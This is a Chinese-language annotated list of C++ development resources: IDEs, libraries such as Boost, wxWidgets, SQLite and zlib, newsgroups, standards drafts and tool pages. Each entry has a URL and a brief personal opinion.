http://msdn2.microsoft.com/zh-cn/express/future/bb421473.aspx#cd
不介绍

IDE:
Anjuta Integrated Development Environment
http://anjuta.sourceforge.net
另外一种选择吧

Code Blocks
http://www.codeblocks.org
不错的跨平台IDE，用wxWidget写的界面

Dev-C++
http://www.bloodshed.net/devcpp.html
界面不友好，简陋

Eclipse C-C++ Development Tooling - CDT
http://www.eclipse.org/cdt
速度慢，没别的缺点

NetBeans
http://www.netbeans.org
一样的速度慢，Java就是一种煎熬

Visual Studio 2008 Express- Downloads
http://msdn2.microsoft.com/zh-cn/express/future/bb421473.aspx#cd
不介绍

Library:
Hans_Boehm GC
http://www.hpl.hp.com/personal/Hans_Boehm/gc
垃圾收集库，使用较广

ACE
http://download.dre.vanderbilt.edu
庞大的C++网络编程库。庞大是缺点也是优点

Blitz++
http://www.oonumerics.org/blitz
科学计算库

Boost - asio
http://asio.sourceforge.net
跨平台的异步网络编程库，必须有boost的支持

Boost C++ Libraries
http://www.boost.org
这还用说吗？

CodeProject- Visual Leak Detector
http://www.codeproject.com/KB/applications/visualleakdetector.aspx
VC下的侦测内存泄漏工具，能追踪到文件名，行号和调用堆栈。推荐

CodeProject- Walking the callstack
http://www.codeproject.com/KB/threads/StackWalker.aspx
VC下打印调用堆栈的小程序

DEELX - Regexp - 正则表达式引擎
http://www.regexlab.com/zh/deelx
整个库只有一个文件，用模版实现，方便，灵活

Dinkumware, Ltd.
http://www.dinkumware.com
微软的STL供货商，收费

SQLite Home Page
http://www.sqlite.org
轻型数据库

Standard Template Library Programmer's Guide
http://www.sgi.com/tech/stl
大名鼎鼎的SGI-STL

StdExt - C++ STL Extensions- STL扩展库
http://cpp.winxgui.com/cn:stdext
给我印象最深的就是一个GC组件

STLport
http://www.stlport.org
现代C++编译器都有STL，它的存在还有意义吗？

STLSoft - Robust, Lightweight, Cross-platform, Template Software
http://www.synesis.com.au/software/stlsoft

TinyXml Main Page
http://www.grinninglizard.com/tinyxml
小型XML库，6个文件直接包含到工程就可以了，文档齐全

wxWidgets
http://www.wxwidgets.org
非常强大的跨平台界面库，推荐

zlib
http://www.zlib.net
是最最最最最最流行的C库，没有几个大型工程不使用它

BBS:
comp.lang.c++ - Google 网上论坛
http://groups.google.com/group/comp.lang.c++/topics?lnk=gschg

comp.lang.c++.moderated - Google 网上论坛
http://groups.google.com/group/comp.lang.c++.moderated/topics?lnk=gschg
带主持人的BBS，帖子需要通过验证，所以垃圾帖，水贴较少，论坛水平高。推荐

Guru of the Week
http://www.gotw.ca/gotw
已经很久没有更新了

Miscellaneous:
Working Draft, Standard for Programming Language C++
http://www.open-std.org/jtc1/sc22/wg21/docs/papers/2007/n2461.pdf
C++ 2007年出的标准草案，估计C++09就和这个差不多了

C++ Library Extensions TR1 - draft
http://www.open-std.org/jtc1/sc22/wg21/docs/papers/2005/n1836.pdf

标准库的扩展草案，这个文档只包含比C++03多出来的部分

Andrei Alexandrescu
http://erdani.org

Bjarne Stroustrup
http://www.research.att.com/~bs/homepage.html

Dependency Walker (depends.exe) Home Page
http://www.dependencywalker.com
Win32平台下，察看文件依赖性的工具，对于项目发布时是必不可少的。

Doxygen
http://www.stack.nl/~dimitri/doxygen
只要按照他的规范写注释，就可以自动生成文档

GNU make中文手册

http://www.linuxsir.org/main/doc/gnumake/GNUmake_v3.80-zh_CN_html/index.html

The C++ Source
http://www.artima.com/cppsource

The C++ Standards Committee
http://www.open-std.org/JTC1/SC22/WG21

WinMerge
http://winmerge.org

侯捷
http://jjhou.csdn.net

刘未鹏
http://blog.csdn.net/pongba